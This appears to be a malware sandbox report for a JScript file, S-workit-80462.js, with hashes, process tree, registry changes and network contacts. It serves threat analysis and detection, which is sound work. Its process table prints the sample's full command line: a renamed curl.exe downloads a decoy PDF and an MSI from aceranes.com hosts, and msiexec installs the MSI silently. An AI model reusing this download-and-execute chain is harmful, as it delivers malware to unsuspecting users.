| File name: | S-workit-80462.js |
| Full analysis: | https://app.any.run/tasks/72fb9edf-5131-4bfd-ba86-b28a354baad8 |
| Verdict: | Malicious activity |
| Analysis date: | June 17, 2024, 23:38:29 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines (1028), with CRLF, LF line terminators |
| MD5: | 5DAF2047634C47F26597045B8519482D |
| SHA1: | 8545CB898956ECAFFDE68248456CA186A0E64AFE |
| SHA256: | 98F544A878AF65D3DD240C38F1820D7FCC3E4E3B6C5FF05AC82EB2CDC36E9A82 |
| SSDEEP: | 48:+bo2TQAfoyL4AGq4ARM4n7q4ApJMRY1hyeygMdQp/3h4cNspt4Tp808QS:9EREjLA996TyBgKO0pt4TS08T |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1684 | TNheBOJElq.exe -o bLhLldebqq.msi https://dev.aceranes.com/download/agent | C:\Users\admin\AppData\Local\Temp\TNheBOJElq.exe | cmd.exe | ||||||||||||
User: admin Company: curl, https://curl.se/ Integrity Level: MEDIUM Description: The curl executable Exit code: 35 Version: 8.4.0 Modules
| |||||||||||||||
| 2116 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2764 | "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\admin\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\admin\Documents\QMQjaBdqIo.pdf" https://lab.aceranes.com/download/pdf & "C:\Users\admin\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://dev.aceranes.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn | C:\Windows\System32\cmd.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1619 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4620 | "C:\Windows\System32\WScript.exe" C:\Users\admin\Downloads\S-workit-80462.js | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 5620 | C:\WINDOWS\system32\msiexec.exe /V | C:\Windows\System32\msiexec.exe | — | services.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5940 | TNheBOJElq.exe -o "C:\Users\admin\Documents\QMQjaBdqIo.pdf" https://lab.aceranes.com/download/pdf | C:\Users\admin\AppData\Local\Temp\TNheBOJElq.exe | cmd.exe | ||||||||||||
User: admin Company: curl, https://curl.se/ Integrity Level: MEDIUM Description: The curl executable Exit code: 35 Version: 8.4.0 Modules
| |||||||||||||||
| 6012 | C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn | C:\Windows\System32\msiexec.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (4620) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (4620) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (4620) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (4620) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (4620) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe |
| Operation: | write | Name: | JScriptSetScriptStateStarted |
Value: AD29110000000000 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2764 | cmd.exe | C:\Users\admin\AppData\Local\Temp\TNheBOJElq.exe | executable | |
MD5:C84486B75D148BDE935E7F8F4084A741 | SHA256:6CF60C768A7377F7C4842C14C3C4D416480A7044A7A5A72B61FF142A796273EC | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4364 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5940 | TNheBOJElq.exe | 8.211.34.5:443 | lab.aceranes.com | Alibaba US Technology Co., Ltd. | DE | unknown |
5228 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1636 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1684 | TNheBOJElq.exe | 8.211.34.5:443 | lab.aceranes.com | Alibaba US Technology Co., Ltd. | DE | unknown |
5140 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
5140 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
5456 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
Domain | IP | Reputation |
|---|---|---|
lab.aceranes.com |
| unknown |
dev.aceranes.com |
| unknown |
settings-win.data.microsoft.com |
| whitelisted |